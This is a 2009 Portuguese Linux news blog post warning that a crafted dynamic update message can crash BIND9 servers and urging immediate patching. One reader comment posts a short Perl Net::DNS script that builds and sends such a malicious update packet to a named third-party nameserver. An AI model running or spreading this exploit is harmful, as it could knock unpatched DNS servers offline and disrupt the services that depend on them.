Visite também: UnderLinux ·  VivaOLinux ·  Dicas-L ·  NoticiasLinux ·  SoftwareLivre.org ·  [mais] ·  Currículo ·  Efetividade

O que é LinuxDownload LinuxApostila LinuxEnviar notícia

«
»

Atenção: Nova vulnerabilidade no BIND9 exige atualização imediata

Enviado por Pablo Hess (phessΘlinuxmagazine·com·br):

“Com uma simples mensagem de atualização especialmente criada, o servidor DNS BIND pode ser derrubado. Já há um exploit para a falha.

Todas as versões do BIND9 estão comprometidas. Recomenda-se fortemente instalar as atualizações 9.4.3-P3, 9.5.1-P3 ou 9.6.1-P1. Algumas distribuições, como Debian e Ubuntu, já oferecem versões atualizadas.

A vulnerabilidade é desencadeada após o servidor receber uma mensagem de atualização dinâmica (“dynamic update message”) especialmente criada. Algo que aumenta a gravidade do problema é o fato de que o exploit funciona mesmo que o servidor esteja configurado para não responder a mensagens de atualização dinâmica.” [referência: linuxmagazine.com.br]

• Publicado por Augusto Campos em 29/07/2009 às 11:26 am
• Link direto para este post: http://br-l.org/!13074
• Siga no Twitter: @brlinuxblog e @augustocc
• Mais posts do mesmo tema: Administração, Destaque

Comentários dos leitores para “Atenção: Nova vulnerabilidade no BIND9 exige atualização imediata”

Os comentários são responsabilidade de seus autores, e não são analisados ou aprovados pelo BR-Linux. Em algumas notícias os comentários são exibidos de forma paginada, com links abaixo do formulário de inserção de novo comentário. Leia os Termos de uso do BR-Linux.

  1. Rafael (usuário não registrado) em 29/07/2009 às 2:55 pm

    #!/usr/bin/perl -w

    use Net::DNS;

    our $NSI = ‘prmns.lg.co.kr’;
    our $NSI_KEY_NAME = ‘domain’;
    our $NSI_KEY = ”;
    my $rzone = ’4.166.136.in-addr.arpa’;
    my $rptr = “70.$rzone”;

    my $packet = Net::DNS::Update->new($rzone);

    $packet->push(
    pre => Net::DNS::RR->new(
    Name => $rptr,
    Class => ‘IN’,
    Type => ‘ANY’,
    TTL => 0,
    )
    );
    $packet->push(
    update => Net::DNS::RR->new(
    Name => $rptr,
    Class => ‘ANY’,
    Type => ‘ANY’,
    )
    );

    $packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;

    print $packet->string;

    Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

    Modere: [+] [-] [fora do tema ou repetitivo] [desinformação] [troll/flame] [generalização ofensiva]
  2. Modere: [+] [-] [fora do tema ou repetitivo] [desinformação] [troll/flame] [generalização ofensiva]

O prazo para comentar neste post já expirou - visite a capa do site para posts mais recentes.